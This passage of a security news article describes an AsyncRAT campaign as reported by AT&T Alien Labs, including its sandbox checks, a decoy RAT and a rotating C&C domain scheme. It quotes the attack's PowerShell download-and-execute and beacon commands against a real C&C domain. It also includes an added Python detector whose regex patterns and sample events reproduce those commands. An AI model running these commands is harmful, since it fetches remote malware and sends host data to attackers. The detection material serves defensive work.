The payload is another encoded script written in PowerShell that is executed directly in memory, without being saved to disk, with a "conhost --headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=)" command. The domain of the C&C server is rotated periodically.
The PowerShell script executes yet another PowerShell script by invoking the iex(curl -useb "http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex") command. This sends some information to the C&C server, such as the computer hostname and a variable called $wiqnfex that indicates the likelihood of the computer being a virtual machine or sandbox. This value is set after the first script performs several checks of the system's graphics card adapter and BIOS, which could reveal emulation in a VM.
If the C&C server determines that $wiqnfex indicates a valid target, the server deploys AsyncRAT. If the variable value indicates a possible VM or sandbox, it redirects the request to Google or to a different PowerShell script that downloads and launches a decoy RAT.
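A defender's view of the execution chain described above: the command-line shapes it leaves in process-creation telemetry can be matched directly. The following is an added example, not code from the article or from the AT&T Alien Labs report; the sample events, the indicator names and the 8/15-letter label assumption for the .top domains are constructed for illustration.

```python
import re

# Constructed sample process-creation events (shape of Sysmon Event ID 1 /
# EDR telemetry); these are not events from the Alien Labs report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\conhost.exe",
     "cmdline": "conhost --headless powershell iex(curl -useb sduyvzep.top/1.php?hash=)"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell iex(curl -useb "http://sduyvzep.top/2.php?id=HOST01&key=1")'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0x4"},
]

# Behavioural indicators taken from the chain described in the article:
# a headless conhost spawning PowerShell, Invoke-Expression over the body of a
# web request, and the beacon shape (8- or 15-letter label under .top, /N.php
# with hash/id/key parameters). The label lengths are an assumption from the report.
HEADLESS_CONHOST = re.compile(r"conhost(?:\.exe)?\s+-{1,2}headless\s+powershell", re.I)
IEX_OF_WEB_REQUEST = re.compile(r"\biex\s*\(\s*(?:curl|iwr|Invoke-WebRequest)\b[^)]*-useb", re.I)
TOP_PHP_BEACON = re.compile(r"\b(?:[a-z]{8}|[a-z]{15})\.top/\d+\.php\?(?:hash|id|key)=", re.I)

INDICATORS = [
    ("headless_conhost_powershell", HEADLESS_CONHOST),
    ("iex_of_web_request", IEX_OF_WEB_REQUEST),
    ("dga_style_top_beacon", TOP_PHP_BEACON),
]

def score_event(event):
    """Return the names of the indicators matched by one event's command line."""
    cmd = event["cmdline"]
    return [name for name, pattern in INDICATORS if pattern.search(cmd)]

def find_suspicious(events, min_hits=2):
    """Flag events matching at least min_hits indicators. Requiring two keeps an
    admin's lone 'curl -useb' from alerting on its own; the conhost/iex/.top
    combination is what the article describes."""
    flagged = []
    for event in events:
        hits = score_event(event)
        if len(hits) >= min_hits:
            flagged.append((event["cmdline"], hits))
    return flagged

if __name__ == "__main__":
    for cmdline, hits in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT {hits}: {cmdline}")
```

Because the domains rotate weekly, the domain regex is the weakest of the three indicators; the headless-conhost and iex-over-download patterns survive a domain change.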
"When decompiled, the RAT is actually a distraction for any researchers looking into the campaign," the Alien Lab researchers said. "The sample is a decoy made to resemble a RAT for several reasons. The assembly name is DecoyClient, and the configuration isn't encrypted as it would be in an AsyncRAT sample. Moreover, the sample doesn't contain a C&C server, only loopback addresses. Also, among the data to be exfiltrated to the C&C, is the string 'LOL' or the group 'GOVNO'."
A new command-and-control domain every week
In addition to regularly randomizing the script code and malware samples to evade detection, the attackers also rotate the C&C domains every week. However, the Alien Lab researchers managed to reverse-engineer the domain generation algorithm and, together with several other constants such as the TLD (.top), the registrar, and the organization name used to register the domains, were able to find the domains used in the past and obtain older samples of the deployment scripts.
"These domains have been observed to carry the same features as mentioned before, with the difference of being 15 characters long," the researchers said. "This allows us to pivot and find historical samples based off the DGA, as well as build detections to identify future infrastructure despite all their efforts to evade EDR and static detections." The AT&T Alien Labs report includes detection signatures for this campaign that can be used with the open-source Suricata intrusion detection system, as well as a list of indicators of compromise (IOC) that can be used to build detections for other systems.